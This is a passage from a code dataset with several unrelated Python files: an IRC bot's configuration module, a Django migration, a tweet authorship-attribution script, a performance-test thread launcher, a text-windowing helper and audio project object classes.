has write\naccess to that file.\n\n(Error Name: ALIASES_UNWRITEABLE)\n\"\"\" % reduceuser(aliases.path),\n\n \"BASE_DIRECTORY_UNWRITEABLE\": ##########\n\"\"\"\nThe directory that your duxlot configuration file is in cannot be written to:\n\n %s\n\nThere is a directory there, but duxlot is unable to access it. There is\nprobably a permissions error with either the directory itself, or one of its\nparent directories. Check to make sure that the user duxlot is running as has\nwrite access to that directory.\n\n(Error Name: BASE_DIRECTORY_UNWRITEABLE)\n\"\"\" % reduceuser(directory.path),\n\n \"BASE_UNUSABLE\": ##########\n\"\"\"\nThe following configuration base is not usable:\n\n %s\n\nThis usually happens when your configuration file is called just \".json\"\ninstead of having a name before the extension, such as \"config.json\". Duxlot\nneeds a base to work with for other files. You can easily solve this by\nrenaming your configuration file.\n\n(Error Name: BASE_UNUSABLE)\n\"\"\", # args: 1\n\n \"CONFIG_NON_REGULAR\": ##########\n\"\"\"\nThe following path exists, but is not a regular file as it ought to be:\n\n %s\n\n@@\n\n(Error Name: CONFIG_NON_REGULAR)\n\"\"\", # args: 1\n\n \"CONFIG_NOT_JSON\": ##########\n\"\"\"\nYour duxlot configuration file exists but is not valid JSON:\n\n %s\n\nThe error message that the JSON parser gave is:\n\n %s\n\nWhich may or may not be helpful, since the duxlot maintainer does not have any\ncontrol over the Python JSON implementation. If you need help writing a valid\nJSON file, try reading through the following resources:\n\nhttp://en.wikipedia.org/wiki/JSON\nhttp://guide.couchdb.org/draft/json.html\n\nYou may also ask the duxlot maintainer for help.\n\n(Error Name: CONFIG_NOT_JSON)\n\"\"\", # args: 2\n\n \"CONFIG_UNREADABLE\": ##########\n\"\"\"\nYour duxlot configuration file exists but can't be read:\n\n %s\n\nThere is probably a permissions error with either the file itself, or one of\nits parent directories. Check to make sure that the user duxlot is running as\nhas access to that file.\n\n(Error Name: CONFIG_UNREADABLE)\n\"\"\", # args: 1\n\n \"CONFIG_UNWRITEABLE\": ##########\n\"\"\"\nYour duxlot configuration file exists but can't be written to:\n\n %s\n\nThere is probably a permissions error with either the file itself, or one of\nits parent directories. Check to make sure that the user duxlot is running as\nhas write access to that file.\n\n(Error Name: CONFIG_UNWRITEABLE)\n\"\"\", # args: 1\n\n \"DIRECTORY_NON_DIRECTORY\": ##########\n\"\"\"\nYour duxlot configuration directory path exists, but is not a directory:\n\n %s\n\nThis is probably because you have written a regular file called .duxlot in your\nhome directory, whereas duxlot wants that to be a directory, in order to put\nthe default configuration file and aliases file in it.\n\nIf you intended .duxlot to be a JSON configuration file, you can still use it\nas such, but it will be incompatible with using configuration path aliases in\nduxlot.\n\n(Error Name: DIRECTORY_NON_DIRECTORY)\n\"\"\" % reduceuser(directory.path),\n\n \"DIRECTORY_UNWRITEABLE\": ##########\n\"\"\"\nYour duxlot configuration directory path exists, but can't be written to:\n\n %s\n\nThere is a directory there, but duxlot is unable to access it. There is\nprobably a permissions error with either the directory itself, or one of its\nparent directories. Check to make sure that the user duxlot is running as has\nwrite access to that directory.\n\n(Error Name: DIRECTORY_UNWRITEABLE)\n\"\"\" % reduceuser(directory.path),\n\n \"OPTION_DISALLOWED\": ##########\n\"\"\"\nYour configuration file contains a disallowed option:\n\n %s\n\nThese options are reserved by duxlot for internal use. Please remove this\noption from your configuration file, and try again.\n\n(Error Name: OPTION_DISALLOWED)\n\"\"\", # args: 1\n\n \"OPTION_UNKNOWN\": ##########\n\"\"\"\nYour configuration file contains an unknown option:\n\n %s\n\nThis is probably a typo for a known option. You can check the list of available\noptions by running:\n\n duxlot options\n\n(Error Name: OPTION_UNKNOWN)\n\"\"\", # args: 1\n\n \"VALUE_DISALLOWED\": ##########\n\"\"\"\nYour configuration file contains a disallowed value:\n\n %s\n\nThe values for the \"%s\" option must be one of the following types:\n\n %s\n\nFor more information on JSON and types, consult the following guides:\n\nhttp://en.wikipedia.org/wiki/JSON\nhttp://guide.couchdb.org/draft/json.html\n\nYou may also ask the duxlot maintainer for help.\n\n(Error Name: VALUE_DISALLOWED)\n\"\"\" # args: 3\n})\n\ndef exists(path):\n if os.path.isfile(path):\n return True\n\n if os.path.exists(path):\n fail(error.CONFIG_NON_REGULAR % path)\n\n return False\n\ndef fail(explanation):\n import sys\n\n sys.stderr.write(explanation.lstrip())\n sys.exit(1)\n\ndef info(name, validate=True):\n if name is None:\n if not exists(default):\n create()\n name = default\n\n config_base = base(name)\n config_base_directory = os.path.dirname(config_base)\n if not writeable(config_base_directory):\n fail(error.BASE_DIRECTORY_UNWRITEABLE)\n\n config_data = read(name)\n\n if validate is True:\n globals()[\"validate\"](config_data) # @@ ffffffffu-\n\n # @@ Could be a FrozenStorage object\n return name, config_base, config_data\n\ndef random_nick():\n import random\n digits = \"0123456789\"\n return \"duxlot\" + \"\".join(random.choice(digits) for n in range(3))\n\ndef minimal():\n return {\n \"channels\": [\"#duxlot-test\"],\n \"nick\": random_nick(),\n \"port\": 6667,\n \"server\": \"irc.freenode.net\"\n }\n\noptions = {\n # @@ store, make use of, module data? (IRC, Core, General)\n # @@ options that control script.py\n \"admins\": (None, {list}, True, # IRC\n \"Nicks of people allowed to use administrative commands\"),\n\n \"adminchans\": ([], {list}, False, # @@\n \"List of channels where administrative commands are allowed\"),\n\n \"channels\": (None, {list}, True, # Core\n \"List of channels to join\"),\n\n \"database\": (\"$(BASE).database\", {str}, False, # IRC\n \"Base to use for database information\"), # @@ PID file?\n\n \"debug\": (False, {bool}, False, # IRC\n \"Whether to catch and display python exceptions in commands\"),\n\n \"flood\": (False, {bool}, False, # IRC\n \"Bypass the built in flood protection\"),\n\n \"nick\": (random_nick(), {str}, True, # IRC, Core, General\n \"Nick for the bot to use for itself\"),\n\n \"nickserv\": (None, {str}, True, # Core\n \"Pass to send to NickServ services bot\"),\n\n \"owner\": (None, {str}, True, # IRC, General\n \"Nick of the owner of the bot, allowed to use owner commands\"),\n\n \"password\": (None, {str}, False, # Core\n \"Password to be sent to the server\"),\n\n \"port\": (6667, {int}, True, # IRC\n \"The port of the server to connect to\"),\n\n \"prefix\": (\".\", {str}, True, # IRC, General\n \"Default prefix used across all channels for commands\"),\n\n \"prefixes\": ({}, {dict}, True, # IRC, General\n \"Mapping of channels to their local command prefix\"),\n\n \"private\": ([], {list}, True, # General\n \"Private channels where seen data should not be recorded\"),\n\n \"server\": (\"irc.freenode.net\", {str}, True, # IRC\n \"The hostname of the server to connect to\"),\n\n \"ssl\": (False, {bool}, False, # IRC\n \"Whether or not to use a *NON-VALIDATED* SSL connection\"),\n\n \"standard\": (\"*\", {list, str}, False, # IRC\n \"Standard modules to import\"),\n\n \"user\": ([], {list}, False, # IRC\n \"Directories of user modules to import\"),\n\n \"zoneinfo\": (\"/usr/share/zoneinfo\", {str}, False, # General\n \"Location of the IETF Zoneinfo database hierarchy\")\n}\n\n# @@ Ugh, these variables leak out of scope\nfor name, (option_default, types, p, documentation) in options.items():\n options[name] = storage.FrozenStorage({\n \"default\": option_default,\n \"types\": types,\n \"public\": p,\n \"documentation\": documentation\n })\n\ndel name\ndel option_default\ndel types\ndel documentation\n\ndef pretty(data):\n return json.dumps(data, sort_keys=True, indent=4)\n\ndef read(path):\n if path.startswith(\"~\") or (not path.startswith(\"/\")):\n raise ValueError(\"Path not canonical: %s\" % path)\n\n if path == aliases.path:\n fail(error.ALIASES_NOT_CONFIG)\n\n try: f = open(path, encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.CONFIG_UNREADABLE % path)\n\n with f:\n try: data = json.load(f)\n except ValueError as err:\n args = (reduceuser(path), str(err))\n fail(error.CONFIG_NOT_JSON % args)\n except UnicodeDecodeError:\n fail(error.CONFIG_NOT_UTF8)\n\n if \"__options__\" in data:\n fail(error.OPTION_DISALLOWED % \"__options__\")\n\n data[\"__options__\"] = set(data.keys())\n\n for name in options:\n if not (name in data):\n data[name] = options[name].default\n\n return data\n\ndef validate(data):\n for option, value in data.items():\n if not option in data[\"__options__\"]:\n # @@ how might this happen?\n # private options like __options__?\n continue\n\n if option.startswith(\"@\"):\n continue\n\n if not option in options:\n fail(error.OPTION_UNKNOWN % option)\n\n if not type(value) in options[option].types:\n # print(option, value, type(value))\n args = (value, option, options[option].types)\n fail(error.VALUE_DISALLOWED % args)\n return True\n\ndef write(path, data, pretty=False):\n if \"__options__\" in data:\n for name in list(data.keys()):\n if name == \"__options__\":\n continue\n\n if name not in data[\"__options__\"]:\n del data[name]\n del data[\"__options__\"]\n\n # @@\n try: f = open(path, \"w\", encoding=\"utf-8\")\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n\n with f:\n if pretty:\n text = globals()[\"pretty\"](data)\n try: f.write(text)\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n else:\n try: json.dump(data, f)\n except (OSError, IOError):\n fail(error.CONFIG_UNWRITEABLE % reduceuser(path))\n\n return True\n\ndef writeable(base):\n # @@ Not a perfect check\n return os.access(base, os.W_OK)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287051111","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0016_storyquestion_category'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ManipulationCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('category', models.CharField(max_length=20)),\n ],\n ),\n migrations.RenameField(\n model_name='storyquestion',\n old_name='category',\n new_name='pointsCategory',\n ),\n migrations.AddField(\n model_name='storyquestion',\n name='manipulationCategory',\n field=models.ForeignKey(default=1, to='game.ManipulationCategory'),\n preserve_default=False,\n ),\n ]\n","sub_path":"game/migrations/0017_auto_20150615_1111.py","file_name":"0017_auto_20150615_1111.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"507823658","text":"\"\"\"\nIssues: \n* rand_users() sampling duplicate users (should be solved)\n* returning users less than 120 tweets (solved)\n* not enough users to make 100 (solved)\n\nTo do:\n* batch reading of json files (done)\n* for users with more than 120 tweets, only consider first 120\n\"\"\"\nimport os\nimport json\nimport numpy as np\nimport random\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ndata_folder = os.path.join(os.path.expanduser(\"~\"), \"Data\", \"research\")\n# results_output_filename = os.path.join(data_folder, \"attribution_results_control_2.json\")\ntweets_folder = os.path.join(data_folder, \"tweets\")\n\nresults_folder = os.path.join(data_folder, \"results\")\n\n\n# [file1, file2, ... ]\ndef read_files_from_dir(datafolder):\n \"\"\" returns full file paths from tweets data folder \"\"\"\n files_list = [os.path.join(tweets_folder, file) for file in os.listdir(tweets_folder)]\n return files_list\n\n# read all tweet files from a folder\nfiles_list = read_files_from_dir(tweets_folder)\n\n\ndef read_merge_tweets(files):\n \"\"\" Given an array of files, read each file (and concatenate?)\"\"\"\n dicts = []\n for file in files:\n with open(file, 'r') as inf:\n tweets_dict = json.load(inf)\n tweets_processed = remove_low_tweet_authors(tweets_dict)\n # tweets = remove_non_ascii_chars(tweets)\n dicts.append(tweets_processed)\n # merge step\n super_dict = defaultdict(list) # uses set to avoid duplicates\n for d in dicts:\n for k, v in iter(d.items()):\n super_dict[k].extend(v)\n return super_dict\n\n\ndef copy_keys(table1, keys):\n \"\"\" \n table1 -- dict that we copy FROM.\n table2 -- dict that we copy TO.\n \"\"\"\n table2 = {}\n for key in keys:\n if table1[key]:\n table2[key] = table1[key]\n else: \n print(\"key does not exist in table 2\")\n break\n return table2\n\n\ndef rand_users(users, sample_size):\n sampled = random.sample(users, sample_size)\n return sampled\n\n\ndef remove_hashtag(tweet):\n pass\n\n\ndef remove_at_symbol(tweet):\n pass\n\n\ndef remove_low_tweet_authors(tweets):\n new_dict = {}\n \"\"\" 120 is an optimal number of tweets for authorship attribution (Layton)\"\"\"\n for key in tweets:\n if len(tweets[key]) < 120:\n # tweets.pop(key, None)\n continue\n else:\n new_dict[key] = tweets[key]\n return new_dict\n\n# tweets.keys()\n\n\n# In[10]:\n\n# print(tweets_folder)\nfor file in files_list:\n print(file)\ntweets = read_merge_tweets(files_list)\nprint(len(tweets.keys()))\n\n\n# In[11]:\n\n# authors = {} ## not needed for actual data mining\ndef join_documents(tweets):\n \"\"\" In Python 3, iteritems() has been replaced simply with items() \"\"\"\n documents = []\n classes = []\n author_num = 0\n # use sorted() to enforce ordered dict iteration\n for key, value in iter(sorted(tweets.items())):\n # concatenate documents into one giant corpus\n documents.extend(value)\n # assign classes values to each respective authors' tweets\n classes.extend([author_num] * len(value))\n author_num += 1\n # print(\"Author: \" + key + \", tweets: \" + str(len(value)))\n return documents, classes\n\nrestricted_words = ['http', 'rt']\n\n\ndef get_unique_words(document, lower=False):\n words = defaultdict(int)\n tweet_length = []\n for tweet in document:\n line = tweet.split()\n num_words = len(line)\n tweet_length.append(num_words)\n # append any unique words (to whole corpus) found in tweet\n for word in line: # word in tweet will return chars, therefore use line\n if lower is True:\n word = word.lower()\n if word.isalpha():\n if not words[word] and word not in restricted_words:\n words[word] = 1\n elif words[word] >= 1:\n words[word] += 1\n else:\n continue\n average_tweet_length = np.mean(tweet_length)\n return words, average_tweet_length\n\n\ndef get_sorted_dict(data):\n d = OrderedDict(sorted(data.items(), key=itemgetter(1), reverse=True))\n return d\n\n\n# for each key, sum values across both dicts\ndef sum_dicts(first, second):\n \"\"\" Warning: very slow! \"\"\"\n from collections import Counter\n first = Counter(first)\n second = Counter(second)\n first_plus_second = first + second\n return dict(first_plus_second)\n\nfrom sklearn.svm import SVC # support vector machines\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import grid_search\n\n\"\"\" Set up the parameters. 'C' \"refers to how much classifier should aim to predict all training samples correctly\"\nKernel introduces non-linear elements to make them linearly separable(?) \n\"\"\"\nparameters = {'kernel': ('linear', 'rbf'), 'C': [1, 10]}\nsvr = SVC()\ngrid = grid_search.GridSearchCV(svr, parameters)\n\n# extract character ngrams\npipeline = Pipeline([('feature_extraction', \n CountVectorizer(analyzer='char', ngram_range=(3, 3))),\n ('classifier', grid)])\n\nscores = defaultdict(list)\n\niter_sample = [30, 40]\nRUNS = 30\n\nfor sample_size in iter_sample:\n vocab_size = []\n tweet_size = []\n master_word_dict = {}\n master_vocab_dict = {}\n count = 0\n while count < RUNS:\n author_subset = rand_users(tweets.keys(), sample_size)\n tweets_subset = copy_keys(tweets, author_subset)\n documents, classes = join_documents(tweets_subset)\n \"\"\" calculate average tweet lengths and author vocab sizes\n words, avg_tweet_length = get_unique_words(documents, lower=True)\n tweet_size.append(avg_tweet_length)\n vocab_size.append(len(words))\n master_word_dict = sum_dicts(master_word_dict, words)\n \"\"\"\n\n # print(\"Vocab size: \" + str(vocab_size[count]))\n # retrieve features (ngrams)\n # NB: ngrams are not as likely to be useful compared to words\n\n\n print(\"Creating model ...\")\n model = pipeline.fit(documents, classes)\n print(\"Model created\")\n feature_set = model.named_steps['feature_extraction']\n print(\"Features extracted\")\n master_vocab_dict = sum_dicts(master_vocab_dict, feature_set.vocabulary_)\n print(\"Dicts summed\")\n print(\"Pass: \" + str(count))\n\n\n \"\"\" calculate scores via 3-fold (default) cross validation\n score = cross_val_score(pipeline, documents, classes, scoring='f1')\n avg_score = np.mean(score)\n scores[sample_size].append(avg_score)\n print(\"Run: \" + str(count + 1) + \", Samples: \" + str(sample_size) + \", Score: \" + str(avg_score))\n \"\"\"\n count += 1\n # sort master word dict\n # words_sorted = get_sorted_dict(master_word_dict)\n # word_list = list(words_sorted.keys())\n # master_word_dict = get_sorted_dict(master_word_dict)\n master_vocab_dict = get_sorted_dict(master_vocab_dict)\n\n \"\"\" End of run summary \"\"\"\n print(\"Samples: \" + str(sample_size) + \", sruns: \" + str(RUNS))\n print(\"Score: {:.3f}\".format(np.mean(scores[sample_size])))\n print(\"Mean vocab size: \" + str(np.mean(vocab_size)))\n print(\"Average tweet size: \" + str(np.mean(tweet_size)))\n\n file_name = \"python_ngrams_\" + str(sample_size) + \".json\"\n word_list_output_filename = os.path.join(results_folder, file_name)\n # save what we currently have\n\n with open(word_list_output_filename, 'w') as fp:\n vocab_list = [(k, str(v)) for k, v in master_vocab_dict.items()]\n json.dump(vocab_list, fp)\n\n\n# In[13]:\n\n# get_ipython().magic('matplotlib inline')","sub_path":"research_train_test-python.py","file_name":"research_train_test-python.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647870577","text":"#\r\n# -*- coding: utf-8 -*-\r\n#\r\n\r\nimport argparse, queue, threading, traceback\r\nfrom libs.config.manager import manager\r\nfrom libs.aix.vmstat import vmstat\r\nfrom libs.aix.shell import shell\r\nfrom libs.logger.logger import logger\r\n\r\nfrom fabric.network import disconnect_all\r\n\r\nparser = argparse.ArgumentParser(prog='WxPerfTestTool.py', add_help=True)\r\nparser.add_argument('--config', type=str, default='./settings.yml', help='設定ファイルパス')\r\nargs = parser.parse_args()\r\n\r\nsets = manager(args.config)\r\nlog = logger(sets.get('logging', 'file')).get()\r\n\r\n# shellスレッド\r\n#\tkey\t:\tキー\r\ndef shell_thread(key):\r\n\tshell(args.config).execute(key)\r\n\treturn\r\n\r\n\r\n# vmstatスレッド\r\n#\tkey\t:\tキー\r\ndef vmstat_thread(key, child_q):\r\n\tvmstat(args.config, child_q).execute(key)\r\n\treturn\r\n\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tth_vmstat = []\r\n\t\tfor key in sets.get('vmstat_idx', 'keys'):\r\n\t\t\tchild_q = queue.PriorityQueue()\r\n\t\t\tth = threading.Thread(target = vmstat_thread, name = 'vmstat', args = ([key, child_q]))\r\n\t\t\tth.start()\r\n\t\t\tth_vmstat.append({'thread': th, 'queue': child_q})\r\n\t\tth_shell = threading.Thread(target = shell_thread, name = 'shell', args = (['shell']))\r\n\t\tth_shell.start()\r\n\t\tth_shell.join(timeout=None)\r\n\t\tfor th in th_vmstat:\r\n\t\t\tth['queue'].put('terminate order')\r\n\t\t\tth['thread'].join(timeout=None)\r\n\t\tth_vmstat = []\r\n\texcept:\r\n\t\tlog.error(traceback.format_exc())\r\n\tfinally:\r\n\t\tdisconnect_all()\r\n","sub_path":"PerfTestTool/src/ClPerfTestTool.py","file_name":"ClPerfTestTool.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"4679463","text":"import numpy as np\nfrom keras.utils import np_utils\nimport re\n\nclass Text:\n def __init__(self,window_size=10,subspace=0,simple = False):\n self.char_to_idx_vec = np.vectorize(self.char_to_idx)\n self.idx_to_char_vec = np.vectorize(self.idx_to_char)\n self.window_size = window_size\n self.subspace = subspace\n self.simple = simple\n\n with open(\"script.txt\",\"r\") as f:\n self.text = f.read()\n\n if simple:\n self.text = self.text.lower()\n\n self.text = self.text.replace(\" \",\"\")\n self.processText()\n\n def processText(self):\n self.chars = np.array(list(self.text))\n if self.subspace < 1 or self.subspace > len(self.chars)-1:\n self.subspace = self.subspace-1\n else:\n self.chars = self.chars[:self.subspace]\n\n self.num_chars = len(self.chars)\n print(\"Text in chars: \"+str(self.num_chars))\n\n self.unique_chars = np.unique(self.chars)\n self.num_unique_chars = len(self.unique_chars)\n print(\"Unique chars: \"+str(self.num_unique_chars))\n\n def idxs_to_chars(self,idxs):\n return np.array(self.idx_to_char_vec(idxs))\n\n def chars_to_idxs(self,chars):\n return np.array(self.char_to_idx_vec(chars))\n\n def idx_to_char(self,idx):\n return self.unique_chars[idx]\n\n def char_to_idx(self,char):\n return np.where(self.unique_chars==char)[0][0]\n\n def pad(self,arr, size):\n if len(arr) < size:\n arr = list(arr)\n while len(arr) < size:\n arr.append(self.char_to_idx(\" \"))\n arr = np.array(arr)\n return arr\n\n def getWindows(self):\n size = self.window_size\n\n x = []\n y = []\n\n for idx, ch in enumerate(self.chars):\n if idx < len(self.chars)-size:\n x.append(self.pad(self.chars_to_idxs(self.chars[idx:idx+size]),size))\n y.append(self.char_to_idx(self.chars[idx+size]))\n\n y = np_utils.to_categorical(y)\n\n return np.array(x),y","sub_path":"getText.py","file_name":"getText.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"529640614","text":"\nimport abc\nimport json\nimport os\nimport random as rd\nimport re\nimport types\n\nimport soundfile as sf\nfrom pydub import AudioSegment as pd\n\nfrom src.data_types import *\nfrom src.errors import *\nfrom src.globals import RelGlobals, Settings\nfrom src.input_processing import inpt, inpt_validate, input_dir, input_file, autofill\nfrom src.method_ops import (ArgData, Category, RelData, _ClsRelData,\n add_reldata, add_reldata_arg, get_reldata,\n get_wrap_all_encloser, has_aliases,\n is_public_process, is_rel_wrap_all, public_process,\n rel_wrap)\nfrom src.output_and_prompting import (critical_err_mess, err_mess, info_block,\n info_line, info_list, info_title,\n log_err, nl, p, section_head, show_error,\n style)\nfrom src.path import join_path, split_path\n\n\nclass RelObject(abc.ABC):\n \"\"\"\n base rel object class\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n for k,v in kwargs.items():\n setattr(self, k, v)\n if is_rel_wrap_all(self):\n self._do_wrap_all()\n\n def _do_wrap_all(self):\n \"\"\"\n wrapping\n \"\"\"\n encloser = get_wrap_all_encloser(self)\n for attr in dir(self):\n if \"__\" not in attr:\n if is_public_process(getattr(self, attr)):\n print(\"a\", type(getattr(self, attr)), getattr(self,attr).__name__)\n new_val = rel_wrap(encloser)(getattr(self, attr))\n setattr(self, attr, new_val)\n\n def parse_write_meta(self, attrs):\n return attrs\n\n @abc.abstractmethod\n def file_ref_repr(self):\n \"\"\"\n how obj is referenced in other object's files\n \"\"\"\n ...\n\n\n\nclass RelContainer(RelObject):\n \"\"\"\n class for objects that are not saved to a file but directly as strings \n in other files\n implement:\n load(self_clss, data) # staticmethod\n file_ref_data(self)\n \"\"\"\n\n setfile_extension = \"rel-set\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def class_data_repr(self):\n mod = self.__class__.__module__\n clss = self.__class__.__name__\n return \"{0},{1}\".format(mod, clss)\n\n def file_ref_repr(self):\n \"\"\"\n don't override. string repr for standalone file references\n \"\"\"\n data_str = json.dumps(self.file_ref_data(), separators=(\",\",\":\"))\n return self.class_data_repr() + \";\" + data_str\n\n def get_set_filename(self, attr_name):\n return attr_name + \".\" + self.__class__.__name__\n\n def get_setfile_fullpath(self, attr_name, path):\n return join_path(path, self.get_set_filename(attr_name) + \".\" + self.setfile_extension)\n\n @abc.abstractmethod\n def file_ref_data(self):\n \"\"\"\n data in primitive types form needed to restore obj with load()\n \"\"\"\n ...\n\n @staticmethod\n @abc.abstractmethod\n def load(self_clss, data):\n \"\"\"\n load object from data returned by file_ref_data\n \"\"\"\n ...\n\n\n\n\nclass RelSavedObj(RelObject):\n \"\"\"\n methods to implement on classes that inherit from this:\n save (if any additional file saving needed beyond save_metadata)\n parse_write_meta (for save_metadata)\n rename (that calls super, and only handles renaming files)\n file_ref_repr (if not the standard name.reltype)\n validate_child_name\n pre_process and post_process\n \"\"\"\n\n datafile_extension = \"rel-obj\"\n\n def __init__(self, rel_id, reltype, name, path, parent, custom_path=False, **kwargs):\n super().__init__(**kwargs)\n self.parent = parent\n self.reltype = reltype\n self.name = name\n if path is None and not custom_path:\n if self.parent is not None:\n self.path = self.parent.get_data_dir()\n else:\n if Settings.is_debug():\n err_mess(\"Warning: Setting relative path for {0} '{1}'\".format(self.reltype, self.name))\n self.path = \"./\"\n else:\n raise UnexpectedIssue(\"Path is None, with no parent\")\n os.makedirs(self.get_data_dir(), exist_ok=True)\n else:\n self.path = path # path not including object's own directory\n self.rel_id = rel_id if rel_id is not None else RelGlobals.get_next_id()\n if path is not None and reltype != \"Program\":\n os.makedirs(self.get_data_dir(), exist_ok=True)\n\n def get_data_dir(self):\n \"\"\"\n get the directory of this object's files\n \"\"\"\n return join_path(self.path, self.get_data_filename(), is_dir=True)\n\n def get_data_filename(self, name=None):\n \"\"\"\n name.reltype : name of directory and datafiles. \n args:\n name: should not be included unless testing a new name\n \"\"\"\n if name == None:\n name = self.name\n return name + \".\" + self.reltype\n\n def get_datafile_fullpath(self):\n \"\"\"\n fullpath of datafile\n \"\"\"\n return join_path(self.get_data_dir(), self.get_data_filename(), ext=self.datafile_extension)\n\n def get_path(self, filename, extension=\"obj\"):\n \"\"\"\n get path to a file or dir \n args:\n extension: \"obj\" for datafile_extension, \"dir\" for directory, or \"wav\"\n \"\"\"\n is_dir = False\n if extension == \"obj\":\n extension = self.datafile_extension\n elif extension in (\"wav\",):\n pass\n elif extension == \"dir\":\n is_dir = True\n extension = None\n else:\n raise UnexpectedIssue(\"Unrecognized extension '{0}'. Add it in RelObject.get_path\".format(extension))\n\n path = join_path(self.get_data_dir(), filename, ext=extension, is_dir=is_dir)\n return path\n\n @public_process\n def rename(self, name=None):\n \"\"\"\n cat: meta\n dev: call this method via super, and implement renaming of files other than \n datafile and its self.path directory\n \"\"\"\n old_name = self.name\n if old_name is not None:\n old_data_dir = self.get_data_dir()\n old_datafile_name = self.get_data_filename()\n\n if name is None:\n p(\"Give this {0} a name\".format(self.reltype))\n name = inpt(\"obj\")\n else:\n name = inpt_validate(name, 'obj')\n\n # validate\n if hasattr(self.parent, \"validate_child_name\"):\n if self.parent.validate_child_name(self, name):\n self.name = name\n info_block(\"Named '{0}'\".format(name))\n else:\n err_mess(\"Invalid name\")\n self.rename()\n else:\n if Settings.is_debug():\n show_error(\n AttributeError(\"Parent obj '{0}' does not have validate_child_name\".format(self.parent))\n )\n else:\n try:\n log_err(\"Parent object type {0} has no 'validate_child_name' method\".format(self.parent.reltype))\n except AttributeError:\n log_err(\"Parent object '{0}' of '{1}' has no 'validate_child_name' method\".format(self.parent, self))\n self.name = name\n info_block(\"Named '{0}'\".format(name))\n \n # if actual renaming and not an initial naming\n if old_name is not None:\n new_data_dir = self.get_data_dir()\n # rename dir\n os.rename(old_data_dir, new_data_dir)\n\n # rename datafile (which is in newdatadir now)\n old_datafile = join_path(new_data_dir, old_datafile_name, ext=self.datafile_extension)\n new_datafile = self.get_datafile_fullpath()\n os.rename(old_datafile, new_datafile)\n\n def save_props(self):\n \"\"\"\n get attr names of all property values\n \"\"\"\n from src.property import RelProperty\n prop_attrs = [i for i in dir(self) if i.startswith(RelProperty.attr_prefix)]\n for i in prop_attrs:\n prop = getattr(self, i)\n try:\n prop.save()\n except AttributeError:\n pass\n\n @public_process\n def save(self):\n \"\"\"\n cat: save\n dev: default save, calls save_meta and saves props. override for additional saving\n \"\"\"\n self.save_metadata()\n self.save_props()\n\n def save_metadata(self):\n \"\"\"\n define parse_write_meta(dict: attrs) to define which attrs to write\n \"\"\"\n info_block(\"saving {0} '{1}' metadata...\".format(self.reltype, self.name))\n\n # must copy list, otherwise we will edit this object's __dict__\n attrs = {k:v for k,v in vars(self).items()}\n attrs = self.parse_write_meta(attrs)\n try:\n del attrs[\"_rel_data\"]\n except KeyError:\n pass\n attrs[\"__module__\"] = self.__class__.__module__\n attrs[\"__class__\"] = self.__class__.__name__\n\n from src.project_loader import RelTypeEncoder\n attrs = RelTypeEncoder.parse_container_obj_sets(attrs, self.get_data_dir())\n\n fullpath = self.get_datafile_fullpath()\n\n with open(fullpath, 'w') as f:\n json.dump(attrs, fp=f, cls=RelTypeEncoder, indent=2)\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override when applicable. remove attrs that shouldnt \n be json encoded to file (e.g. audio data) by overriding this method\n \"\"\"\n return super().parse_write_meta(attrs)\n\n def file_ref_repr(self):\n \"\"\"\n don't override. how this object is referenced in other objects json data files\n \"\"\"\n return self.get_data_filename()\n\n def post_process(self, method_obj):\n \"\"\"\n override with super() to provide post processing\n \"\"\"\n if get_reldata(method_obj, \"category\") == Category.META:\n self.save_metadata()\n\n\n\nclass RelAudioObj(RelSavedObj):\n \"\"\"\n object with audio\n \"\"\"\n\n def __init__(self, arr=None, rate=None, rel_id=None, reltype=None, name=None,\n path=None, parent=None, **kwargs):\n super().__init__(rel_id=rel_id, reltype=reltype, name=name, path=path,\n parent=parent, **kwargs)\n\n self.arr = arr\n self.rate = rate\n\n def get_audiofile_fullpath(self):\n \"\"\"\n datafile path, but wav extension instead\n \"\"\"\n return self.get_path(self.get_data_filename(), extension=\"wav\")\n\n @public_process\n def save(self):\n \"\"\"\n cat: save\n dev: default save method, just calls save_metadata. override for additional saving\n \"\"\"\n super().save()\n self.save_audio()\n\n def parse_write_meta(self, attrs):\n \"\"\"\n override with super() call when applicable. remove attrs that shouldnt \n be json encoded to file (e.g. audio data) by overriding this method\n \"\"\"\n attrs = super().parse_write_meta(attrs)\n del attrs['arr']\n if self.arr is None:\n attrs[\"file\"] = None\n else:\n attrs[\"file\"] = self.get_audiofile_fullpath()\n return attrs\n\n def save_audio(self):\n \"\"\"\n base wav audio saving. requires 'rate' and 'arr' attributes\n \"\"\"\n info_block(\"saving audio of {0} '{1}'...\".format(self.reltype, self.name))\n if self.arr is None:\n info_line(\"no audio to save...\")\n else:\n sf.write(self.get_audiofile_fullpath(), self.arr, self.rate.magnitude)\n\n def read_file(self, file_path=None):\n \"\"\"\n reads files for recording object init\n takes multiple formats (via PyDub and Soundfile)\n updates self.source, self.arr, self.rate\n 